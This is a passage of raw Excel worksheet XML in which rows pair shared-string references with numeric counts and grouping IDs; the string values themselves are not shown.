        <v>0</v>
      </c>
      <c r="D12305">
        <v>1035</v>
      </c>
    </row>
    <row r="12306" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12306" t="s">
        <v>16228</v>
      </c>
      <c r="B12306" t="s">
        <v>16215</v>
      </c>
      <c r="C12306">
        <v>23</v>
      </c>
      <c r="D12306">
        <v>1035</v>
      </c>
    </row>
    <row r="12307" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12307" t="s">
        <v>16231</v>
      </c>
      <c r="B12307" t="s">
        <v>16216</v>
      </c>
      <c r="C12307">
        <v>20</v>
      </c>
      <c r="D12307">
        <v>1035</v>
      </c>
    </row>
    <row r="12308" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12308" t="s">
        <v>16228</v>
      </c>
      <c r="B12308" t="s">
        <v>16217</v>
      </c>
      <c r="C12308">
        <v>119</v>
      </c>
      <c r="D12308">
        <v>1035</v>
      </c>
    </row>
    <row r="12309" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12309" t="s">
        <v>16231</v>
      </c>
      <c r="B12309" t="s">
        <v>16218</v>
      </c>
      <c r="C12309">
        <v>77</v>
      </c>
      <c r="D12309">
        <v>1035</v>
      </c>
    </row>
    <row r="12310" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12310" t="s">
        <v>16229</v>
      </c>
      <c r="B12310" t="s">
        <v>16219</v>
      </c>
      <c r="C12310">
        <v>7</v>
      </c>
      <c r="D12310">
        <v>1035</v>
      </c>
    </row>
    <row r="12311" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12311" t="s">
        <v>16230</v>
      </c>
      <c r="B12311" t="s">
        <v>16220</v>
      </c>
      <c r="C12311">
        <v>20</v>
      </c>
      <c r="D12311">
        <v>1035</v>
      </c>
    </row>
    <row r="12312" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12312" t="s">
        <v>16229</v>
      </c>
      <c r="B12312" t="s">
        <v>16221</v>
      </c>
      <c r="C12312">
        <v>44</v>
      </c>
      <c r="D12312">
        <v>1035</v>
      </c>
    </row>
    <row r="12313" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12313" t="s">
        <v>16230</v>
      </c>
      <c r="B12313" t="s">
        <v>16222</v>
      </c>
      <c r="C12313">
        <v>234</v>
      </c>
      <c r="D12313">
        <v>1035</v>
      </c>
    </row>
    <row r="12314" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12314" t="s">
        <v>16223</v>
      </c>
      <c r="B12314" t="s">
        <v>16223</v>
      </c>
      <c r="C12314">
        <v>6</v>
      </c>
      <c r="D12314">
        <v>1035</v>
      </c>
    </row>
    <row r="12315" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12315" t="s">
        <v>16224</v>
      </c>
      <c r="B12315" t="s">
        <v>16224</v>
      </c>
      <c r="C12315">
        <v>1</v>
      </c>
      <c r="D12315">
        <v>1035</v>
      </c>
    </row>
    <row r="12316" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12316" t="s">
        <v>16228</v>
      </c>
      <c r="B12316" t="s">
        <v>16211</v>
      </c>
      <c r="C12316">
        <v>0</v>
      </c>
      <c r="D12316">
        <v>2857</v>
      </c>
    </row>
    <row r="12317" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12317" t="s">
        <v>16231</v>
      </c>
      <c r="B12317" t="s">
        <v>16212</v>
      </c>
      <c r="C12317">
        <v>0</v>
      </c>
      <c r="D12317">
        <v>2857</v>
      </c>
    </row>
    <row r="12318" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12318" t="s">
        <v>16228</v>
      </c>
      <c r="B12318" t="s">
        <v>16213</v>
      </c>
      <c r="C12318">
        <v>0</v>
      </c>
      <c r="D12318">
        <v>2857</v>
      </c>
    </row>
    <row r="12319" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12319" t="s">
        <v>16231</v>
      </c>
      <c r="B12319" t="s">
        <v>16214</v>
      </c>
      <c r="C12319">
        <v>0</v>
      </c>
      <c r="D12319">
        <v>2857</v>
      </c>
    </row>
    <row r="12320" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12320" t="s">
        <v>16228</v>
      </c>
      <c r="B12320" t="s">
        <v>16215</v>
      </c>
      <c r="C12320">
        <v>6</v>
      </c>
      <c r="D12320">
        <v>2857</v>
      </c>
    </row>
    <row r="12321" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12321" t="s">
        <v>16231</v>
      </c>
      <c r="B12321" t="s">
        <v>16216</v>
      </c>
      <c r="C12321">
        <v>10</v>
      </c>
      <c r="D12321">
        <v>2857</v>
      </c>
    </row>
    <row r="12322" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12322" t="s">
        <v>16228</v>
      </c>
      <c r="B12322" t="s">
        <v>16217</v>
      </c>
      <c r="C12322">
        <v>32</v>
      </c>
      <c r="D12322">
        <v>2857</v>
      </c>
    </row>
    <row r="12323" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12323" t="s">
        <v>16231</v>
      </c>
      <c r="B12323" t="s">
        <v>16218</v>
      </c>
      <c r="C12323">
        <v>8</v>
      </c>
      <c r="D12323">
        <v>2857</v>
      </c>
    </row>
    <row r="12324" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12324" t="s">
        <v>16229</v>
      </c>
      <c r="B12324" t="s">
        <v>16219</v>
      </c>
      <c r="C12324">
        <v>16</v>
      </c>
      <c r="D12324">
        <v>2857</v>
      </c>
    </row>
    <row r="12325" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12325" t="s">
        <v>16230</v>
      </c>
      <c r="B12325" t="s">
        <v>16220</v>
      </c>
      <c r="C12325">
        <v>85</v>
      </c>
      <c r="D12325">
        <v>2857</v>
      </c>
    </row>
    <row r="12326" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12326" t="s">
        <v>16229</v>
      </c>
      <c r="B12326" t="s">
        <v>16221</v>
      </c>
      <c r="C12326">
        <v>204</v>
      </c>
      <c r="D12326">
        <v>2857</v>
      </c>
    </row>
    <row r="12327" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12327" t="s">
        <v>16230</v>
      </c>
      <c r="B12327" t="s">
        <v>16222</v>
      </c>
      <c r="C12327">
        <v>281</v>
      </c>
      <c r="D12327">
        <v>2857</v>
      </c>
    </row>
    <row r="12328" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12328" t="s">
        <v>16223</v>
      </c>
      <c r="B12328" t="s">
        <v>16223</v>
      </c>
      <c r="C12328">
        <v>25</v>
      </c>
      <c r="D12328">
        <v>2857</v>
      </c>
    </row>
    <row r="12329" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12329" t="s">
        <v>16224</v>
      </c>
      <c r="B12329" t="s">
        <v>16224</v>
      </c>
      <c r="C12329">
        <v>1</v>
      </c>
      <c r="D12329">
        <v>2857</v>
      </c>
    </row>
    <row r="12330" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12330" t="s">
        <v>16228</v>
      </c>
      <c r="B12330" t="s">
        <v>16211</v>
      </c>
      <c r="C12330">
        <v>0</v>
      </c>
      <c r="D12330">
        <v>1223</v>
      </c>
    </row>
    <row r="12331" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12331" t="s">
        <v>16231</v>
      </c>
      <c r="B12331" t="s">
        <v>16212</v>
      </c>
      <c r="C12331">
        <v>0</v>
      </c>
      <c r="D12331">
        <v>1223</v>
      </c>
    </row>
    <row r="12332" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12332" t="s">
        <v>16228</v>
      </c>
      <c r="B12332" t="s">
        <v>16213</v>
      </c>
      <c r="C12332">
        <v>0</v>
      </c>
      <c r="D12332">
        <v>1223</v>
      </c>
    </row>
    <row r="12333" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12333" t="s">
        <v>16231</v>
      </c>
      <c r="B12333" t="s">
        <v>16214</v>
      </c>
      <c r="C12333">
        <v>0</v>
      </c>
      <c r="D12333">
        <v>1223</v>
      </c>
    </row>
    <row r="12334" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12334" t="s">
        <v>16228</v>
      </c>
      <c r="B12334" t="s">
        <v>16215</v>
      </c>
      <c r="C12334">
        <v>0</v>
      </c>
      <c r="D12334">
        <v>1223</v>
      </c>
    </row>
    <row r="12335" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12335" t="s">
        <v>16231</v>
      </c>
      <c r="B12335" t="s">
        <v>16216</v>
      </c>
      <c r="C12335">
        <v>2</v>
      </c>
      <c r="D12335">
        <v>1223</v>
      </c>
    </row>
    <row r="12336" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12336" t="s">
        <v>16228</v>
      </c>
      <c r="B12336" t="s">
        <v>16217</v>
      </c>
      <c r="C12336">
        <v>2</v>
      </c>
      <c r="D12336">
        <v>1223</v>
      </c>
    </row>
    <row r="12337" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12337" t="s">
        <v>16231</v>
      </c>
      <c r="B12337" t="s">
        <v>16218</v>
      </c>
      <c r="C12337">
        <v>2</v>
      </c>
      <c r="D12337">
        <v>1223</v>
      </c>
    </row>
    <row r="12338" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12338" t="s">
        <v>16229</v>
      </c>
      <c r="B12338" t="s">
        <v>16219</v>
      </c>
      <c r="C12338">
        <v>2</v>
      </c>
      <c r="D12338">
        <v>1223</v>
      </c>
    </row>
    <row r="12339" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12339" t="s">
        <v>16230</v>
      </c>
      <c r="B12339" t="s">
        <v>16220</v>
      </c>
      <c r="C12339">
        <v>3</v>
      </c>
      <c r="D12339">
        <v>1223</v>
      </c>
    </row>
    <row r="12340" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12340" t="s">
        <v>16229</v>
      </c>
      <c r="B12340" t="s">
        <v>16221</v>
      </c>
      <c r="C12340">
        <v>3</v>
      </c>
      <c r="D12340">
        <v>1223</v>
      </c>
    </row>
    <row r="12341" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12341" t="s">
        <v>16230</v>
      </c>
      <c r="B12341" t="s">
        <v>16222</v>
      </c>
      <c r="C12341">
        <v>20</v>
      </c>
      <c r="D12341">
        <v>1223</v>
      </c>
    </row>
    <row r="12342" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12342" t="s">
        <v>16223</v>
      </c>
      <c r="B12342" t="s">
        <v>16223</v>
      </c>
      <c r="C12342">
        <v>26</v>
      </c>
      <c r="D12342">
        <v>1223</v>
      </c>
    </row>
    <row r="12343" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12343" t="s">
        <v>16224</v>
      </c>
      <c r="B12343" t="s">
        <v>16224</v>
      </c>
      <c r="C12343">
        <v>0</v>
      </c>
      <c r="D12343">
        <v>1223</v>
      </c>
    </row>
    <row r="12344" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12344" t="s">
        <v>16228</v>
      </c>
      <c r="B12344" t="s">
        <v>16211</v>
      </c>
      <c r="C12344">
        <v>1</v>
      </c>
      <c r="D12344">
        <v>272</v>
      </c>
    </row>
    <row r="12345" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12345" t="s">
        <v>16228</v>
      </c>
      <c r="B12345" t="s">
        <v>16213</v>
      </c>
      <c r="C12345">
        <v>4</v>
      </c>
      <c r="D12345">
        <v>272</v>
      </c>
    </row>
    <row r="12346" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12346" t="s">
        <v>16228</v>
      </c>
      <c r="B12346" t="s">
        <v>16215</v>
      </c>
      <c r="C12346">
        <v>74</v>
      </c>
      <c r="D12346">
        <v>272</v>
      </c>
    </row>
    <row r="12347" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12347" t="s">
        <v>16231</v>
      </c>
      <c r="B12347" t="s">
        <v>16216</v>
      </c>
      <c r="C12347">
        <v>46</v>
      </c>
      <c r="D12347">
        <v>272</v>
      </c>
    </row>
    <row r="12348" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12348" t="s">
        <v>16228</v>
      </c>
      <c r="B12348" t="s">
        <v>16217</v>
      </c>
      <c r="C12348">
        <v>342</v>
      </c>
      <c r="D12348">
        <v>272</v>
      </c>
    </row>
    <row r="12349" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12349" t="s">
        <v>16231</v>
      </c>
      <c r="B12349" t="s">
        <v>16218</v>
      </c>
      <c r="C12349">
        <v>1358</v>
      </c>
      <c r="D12349">
        <v>272</v>
      </c>
    </row>
    <row r="12350" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12350" t="s">
        <v>16228</v>
      </c>
      <c r="B12350" t="s">
        <v>16211</v>
      </c>
      <c r="C12350">
        <v>2</v>
      </c>
      <c r="D12350">
        <v>272</v>
      </c>
    </row>
    <row r="12351" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12351" t="s">
        <v>16228</v>
      </c>
      <c r="B12351" t="s">
        <v>16213</v>
      </c>
      <c r="C12351">
        <v>3</v>
      </c>
      <c r="D12351">
        <v>272</v>
      </c>
    </row>
    <row r="12352" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12352" t="s">
        <v>16228</v>
      </c>
      <c r="B12352" t="s">
        <v>16211</v>
      </c>
      <c r="C12352">
        <v>0</v>
      </c>
      <c r="D12352">
        <v>1162</v>
      </c>
    </row>
    <row r="12353" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12353" t="s">
        <v>16231</v>
      </c>
      <c r="B12353" t="s">
        <v>16212</v>
      </c>
      <c r="C12353">
        <v>0</v>
      </c>
      <c r="D12353">
        <v>1162</v>
      </c>
    </row>
    <row r="12354" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12354" t="s">
        <v>16228</v>
      </c>
      <c r="B12354" t="s">
        <v>16213</v>
      </c>
      <c r="C12354">
        <v>0</v>
      </c>
      <c r="D12354">
        <v>1162</v>
      </c>
    </row>
    <row r="12355" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12355" t="s">
        <v>16231</v>
      </c>
      <c r="B12355" t="s">
        <v>16214</v>
      </c>
      <c r="C12355">
        <v>0</v>
      </c>
      <c r="D12355">
        <v>1162</v>
      </c>
    </row>
    <row r="12356" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12356" t="s">
        <v>16228</v>
      </c>
      <c r="B12356" t="s">
        <v>16215</v>
      </c>
      <c r="C12356">
        <v>2</v>
      </c>
      <c r="D12356">
        <v>1162</v>
      </c>
    </row>
    <row r="12357" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12357" t="s">
        <v>16231</v>
      </c>
      <c r="B12357" t="s">
        <v>16216</v>
      </c>
      <c r="C12357">
        <v>16</v>
      </c>
      <c r="D12357">
        <v>1162</v>
      </c>
    </row>
    <row r="12358" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12358" t="s">
        <v>16228</v>
      </c>
      <c r="B12358" t="s">
        <v>16217</v>
      </c>
      <c r="C12358">
        <v>6</v>
      </c>
      <c r="D12358">
        <v>1162</v>
      </c>
    </row>
    <row r="12359" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12359" t="s">
        <v>16231</v>
      </c>
      <c r="B12359" t="s">
        <v>16218</v>
      </c>
      <c r="C12359">
        <v>7</v>
      </c>
      <c r="D12359">
        <v>1162</v>
      </c>
    </row>
    <row r="12360" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12360" t="s">
        <v>16229</v>
      </c>
      <c r="B12360" t="s">
        <v>16219</v>
      </c>
      <c r="C12360">
        <v>0</v>
      </c>
      <c r="D12360">
        <v>1162</v>
      </c>
    </row>
    <row r="12361" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12361" t="s">
        <v>16230</v>
      </c>
      <c r="B12361" t="s">
        <v>16220</v>
      </c>
      <c r="C12361">
        <v>0</v>
      </c>
      <c r="D12361">
        <v>1162</v>
      </c>
    </row>
    <row r="12362" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12362" t="s">
        <v>16229</v>
      </c>
      <c r="B12362" t="s">
        <v>16221</v>
      </c>
      <c r="C12362">
        <v>80</v>
      </c>
      <c r="D12362">
        <v>1162</v>
      </c>
    </row>
    <row r="12363" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12363" t="s">
        <v>16230</v>
      </c>
      <c r="B12363" t="s">
        <v>16222</v>
      </c>
      <c r="C12363">
        <v>0</v>
      </c>
      <c r="D12363">
        <v>1162</v>
      </c>
    </row>
    <row r="12364" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12364" t="s">
        <v>16223</v>
      </c>
      <c r="B12364" t="s">
        <v>16223</v>
      </c>
      <c r="C12364">
        <v>30</v>
      </c>
      <c r="D12364">
        <v>1162</v>
      </c>
    </row>
    <row r="12365" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12365" t="s">
        <v>16224</v>
      </c>
      <c r="B12365" t="s">
        <v>16224</v>
      </c>
      <c r="C12365">
        <v>1</v>
      </c>
      <c r="D12365">
        <v>1162</v>
      </c>
    </row>
    <row r="12366" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12366" t="s">
        <v>16230</v>
      </c>
      <c r="B12366" t="s">
        <v>16220</v>
      </c>
      <c r="C12366">
        <v>45</v>
      </c>
      <c r="D12366">
        <v>1162</v>
      </c>
    </row>
    <row r="12367" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12367" t="s">
        <v>16230</v>
      </c>
      <c r="B12367" t="s">
        <v>16222</v>
      </c>
      <c r="C12367">
        <v>600</v>
      </c>
      <c r="D12367">
        <v>1162</v>
      </c>
    </row>
    <row r="12368" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12368" t="s">
        <v>16228</v>
      </c>
      <c r="B12368" t="s">
        <v>16211</v>
      </c>
      <c r="C12368">
        <v>0</v>
      </c>
      <c r="D12368">
        <v>4958</v>
      </c>
    </row>
    <row r="12369" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12369" t="s">
        <v>16231</v>
      </c>
      <c r="B12369" t="s">
        <v>16212</v>
      </c>
      <c r="C12369">
        <v>0</v>
      </c>
      <c r="D12369">
        <v>4958</v>
      </c>
    </row>
    <row r="12370" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12370" t="s">
        <v>16228</v>
      </c>
      <c r="B12370" t="s">
        <v>16213</v>
      </c>
      <c r="C12370">
        <v>0</v>
      </c>
      <c r="D12370">
        <v>4958</v>
      </c>
    </row>
    <row r="12371" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12371" t="s">
        <v>16231</v>
      </c>
      <c r="B12371" t="s">
        <v>16214</v>
      </c>
      <c r="C12371">
        <v>0</v>
      </c>
      <c r="D12371">
        <v>4958</v>
      </c>
    </row>
    <row r="12372" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12372" t="s">
        <v>16228</v>
      </c>
      <c r="B12372" t="s">
        <v>16215</v>
      </c>
      <c r="C12372">
        <v>2</v>
      </c>
      <c r="D12372">
        <v>4958</v>
      </c>
    </row>
    <row r="12373" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12373" t="s">
        <v>16231</v>
      </c>
      <c r="B12373" t="s">
        <v>16216</v>
      </c>
      <c r="C12373">
        <v>3</v>
      </c>
      <c r="D12373">
        <v>4958</v>
      </c>
    </row>
    <row r="12374" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12374" t="s">
        <v>16228</v>
      </c>
      <c r="B12374" t="s">
        <v>16217</v>
      </c>
      <c r="C12374">
        <v>15</v>
      </c>
      <c r="D12374">
        <v>4958</v>
      </c>
    </row>
    <row r="12375" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12375" t="s">
        <v>16231</v>
      </c>
      <c r="B12375" t="s">
        <v>16218</v>
      </c>
      <c r="C12375">
        <v>2</v>
      </c>
      <c r="D12375">
        <v>4958</v>
      </c>
    </row>
    <row r="12376" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12376" t="s">
        <v>16229</v>
      </c>
      <c r="B12376" t="s">
        <v>16219</v>
      </c>
      <c r="C12376">
        <v>0</v>
      </c>
      <c r="D12376">
        <v>4958</v>
      </c>
    </row>
    <row r="12377" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12377" t="s">
        <v>16230</v>
      </c>
      <c r="B12377" t="s">
        <v>16220</v>
      </c>
      <c r="C12377">
        <v>0</v>
      </c>
      <c r="D12377">
        <v>4958</v>
      </c>
    </row>
    <row r="12378" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12378" t="s">
        <v>16229</v>
      </c>
      <c r="B12378" t="s">
        <v>16221</v>
      </c>
      <c r="C12378">
        <v>8</v>
      </c>
      <c r="D12378">
        <v>4958</v>
      </c>
    </row>
    <row r="12379" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12379" t="s">
        <v>16230</v>
      </c>
      <c r="B12379" t="s">
        <v>16222</v>
      </c>
      <c r="C12379">
        <v>20</v>
      </c>
      <c r="D12379">
        <v>4958</v>
      </c>
    </row>
    <row r="12380" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12380" t="s">
        <v>16223</v>
      </c>
      <c r="B12380" t="s">
        <v>16223</v>
      </c>
      <c r="C12380">
        <v>26</v>
      </c>
      <c r="D12380">
        <v>4958</v>
      </c>
    </row>
    <row r="12381" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12381" t="s">
        <v>16224</v>
      </c>
      <c r="B12381" t="s">
        <v>16224</v>
      </c>
      <c r="C12381">
        <v>1</v>
      </c>
      <c r="D12381">
        <v>4958</v>
      </c>
    </row>
    <row r="12382" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12382" t="s">
        <v>16231</v>
      </c>
      <c r="B12382" t="s">
        <v>16218</v>
      </c>
      <c r="C12382">
        <v>1</v>
      </c>
      <c r="D12382">
        <v>773</v>
      </c>
    </row>
    <row r="12383" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12383" t="s">
        <v>16228</v>
      </c>
      <c r="B12383" t="s">
        <v>16211</v>
      </c>
      <c r="C12383">
        <v>0</v>
      </c>
      <c r="D12383">
        <v>5049</v>
      </c>
    </row>
    <row r="12384" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12384" t="s">
        <v>16231</v>
      </c>
      <c r="B12384" t="s">
        <v>16212</v>
      </c>
      <c r="C12384">
        <v>0</v>
      </c>
      <c r="D12384">
        <v>5049</v>
      </c>
    </row>
    <row r="12385" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12385" t="s">
        <v>16228</v>
      </c>
      <c r="B12385" t="s">
        <v>16213</v>
      </c>
      <c r="C12385">
        <v>0</v>
      </c>
      <c r="D12385">
        <v>5049</v>
      </c>
    </row>
    <row r="12386" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12386" t="s">
        <v>16231</v>
      </c>
      <c r="B12386" t="s">
        <v>16214</v>
      </c>
      <c r="C12386">
        <v>0</v>
      </c>
      <c r="D12386">
        <v>5049</v>
      </c>
    </row>
    <row r="12387" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12387" t="s">
        <v>16228</v>
      </c>
      <c r="B12387" t="s">
        <v>16215</v>
      </c>
      <c r="C12387">
        <v>1</v>
      </c>
      <c r="D12387">
        <v>5049</v>
      </c>
    </row>
    <row r="12388" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12388" t="s">
        <v>16231</v>
      </c>
      <c r="B12388" t="s">
        <v>16216</v>
      </c>
      <c r="C12388">
        <v>1</v>
      </c>
      <c r="D12388">
        <v>5049</v>
      </c>
    </row>
    <row r="12389" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12389" t="s">
        <v>16228</v>
      </c>
      <c r="B12389" t="s">
        <v>16217</v>
      </c>
      <c r="C12389">
        <v>2</v>
      </c>
      <c r="D12389">
        <v>5049</v>
      </c>
    </row>
    <row r="12390" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12390" t="s">
        <v>16231</v>
      </c>
      <c r="B12390" t="s">
        <v>16218</v>
      </c>
      <c r="C12390">
        <v>1</v>
      </c>
      <c r="D12390">
        <v>5049</v>
      </c>
    </row>
    <row r="12391" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12391" t="s">
        <v>16229</v>
      </c>
      <c r="B12391" t="s">
        <v>16219</v>
      </c>
      <c r="C12391">
        <v>0</v>
      </c>
      <c r="D12391">
        <v>5049</v>
      </c>
    </row>
    <row r="12392" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12392" t="s">
        <v>16230</v>
      </c>
      <c r="B12392" t="s">
        <v>16220</v>
      </c>
      <c r="C12392">
        <v>0</v>
      </c>
      <c r="D12392">
        <v>5049</v>
      </c>
    </row>
    <row r="12393" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12393" t="s">
        <v>16229</v>
      </c>
      <c r="B12393" t="s">
        <v>16221</v>
      </c>
      <c r="C12393">
        <v>4</v>
      </c>
      <c r="D12393">
        <v>5049</v>
      </c>
    </row>
    <row r="12394" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12394" t="s">
        <v>16230</v>
      </c>
      <c r="B12394" t="s">
        <v>16222</v>
      </c>
      <c r="C12394">
        <v>20</v>
      </c>
      <c r="D12394">
        <v>5049</v>
      </c>
    </row>
    <row r="12395" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12395" t="s">
        <v>16223</v>
      </c>
      <c r="B12395" t="s">
        <v>16223</v>
      </c>
      <c r="C12395">
        <v>26</v>
      </c>
      <c r="D12395">
        <v>5049</v>
      </c>
    </row>
    <row r="12396" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12396" t="s">
        <v>16224</v>
      </c>
      <c r="B12396" t="s">
        <v>16224</v>
      </c>
      <c r="C12396">
        <v>0</v>
      </c>
      <c r="D12396">
        <v>5049</v>
      </c>
    </row>
    <row r="12397" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12397" t="s">
        <v>16228</v>
      </c>
      <c r="B12397" t="s">
        <v>16211</v>
      </c>
      <c r="C12397">
        <v>0</v>
      </c>
      <c r="D12397">
        <v>997</v>
      </c>
    </row>
    <row r="12398" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12398" t="s">
        <v>16231</v>
      </c>
      <c r="B12398" t="s">
        <v>16212</v>
      </c>
      <c r="C12398">
        <v>0</v>
      </c>
      <c r="D12398">
        <v>997</v>
      </c>
    </row>
    <row r="12399" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12399" t="s">
        <v>16228</v>
      </c>
      <c r="B12399" t="s">
        <v>16213</v>
      </c>
      <c r="C12399">
        <v>0</v>
      </c>
      <c r="D12399">
        <v>997</v>
      </c>
    </row>
    <row r="12400" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12400" t="s">
        <v>16231</v>
      </c>
      <c r="B12400" t="s">
        <v>16214</v>
      </c>
      <c r="C12400">
        <v>0</v>
      </c>
      <c r="D12400">
        <v>997</v>
      </c>
    </row>
    <row r="12401" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12401" t="s">
        <v>16228</v>
      </c>
      <c r="B12401" t="s">
        <v>16215</v>
      </c>
      <c r="C12401">
        <v>1</v>
      </c>
      <c r="D12401">
        <v>997</v>
      </c>
    </row>
    <row r="12402" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12402" t="s">
        <v>16231</v>
      </c>
      <c r="B12402" t="s">
        <v>16216</v>
      </c>
      <c r="C12402">
        <v>0</v>
      </c>
      <c r="D12402">
        <v>997</v>
      </c>
    </row>
    <row r="12403" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12403" t="s">
        <v>16228</v>
      </c>
      <c r="B12403" t="s">
        <v>16217</v>
      </c>
      <c r="C12403">
        <v>1</v>
      </c>
      <c r="D12403">
        <v>997</v>
      </c>
    </row>
    <row r="12404" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12404" t="s">
        <v>16231</v>
      </c>
      <c r="B12404" t="s">
        <v>16218</v>
      </c>
      <c r="C12404">
        <v>1</v>
      </c>
      <c r="D12404">
        <v>997</v>
      </c>
    </row>
    <row r="12405" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12405" t="s">
        <v>16229</v>
      </c>
      <c r="B12405" t="s">
        <v>16219</v>
      </c>
      <c r="C12405">
        <v>0</v>
      </c>
      <c r="D12405">
        <v>997</v>
      </c>
    </row>
    <row r="12406" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12406" t="s">
        <v>16230</v>
      </c>
      <c r="B12406" t="s">
        <v>16220</v>
      </c>
      <c r="C12406">
        <v>0</v>
      </c>
      <c r="D12406">
        <v>997</v>
      </c>
    </row>
    <row r="12407" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12407" t="s">
        <v>16229</v>
      </c>
      <c r="B12407" t="s">
        <v>16221</v>
      </c>
      <c r="C12407">
        <v>12</v>
      </c>
      <c r="D12407">
        <v>997</v>
      </c>
    </row>
    <row r="12408" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12408" t="s">
        <v>16230</v>
      </c>
      <c r="B12408" t="s">
        <v>16222</v>
      </c>
      <c r="C12408">
        <v>20</v>
      </c>
      <c r="D12408">
        <v>997</v>
      </c>
    </row>
    <row r="12409" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12409" t="s">
        <v>16223</v>
      </c>
      <c r="B12409" t="s">
        <v>16223</v>
      </c>
      <c r="C12409">
        <v>14</v>
      </c>
      <c r="D12409">
        <v>997</v>
      </c>
    </row>
    <row r="12410" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12410" t="s">
        <v>16224</v>
      </c>
      <c r="B12410" t="s">
        <v>16224</v>
      </c>
      <c r="C12410">
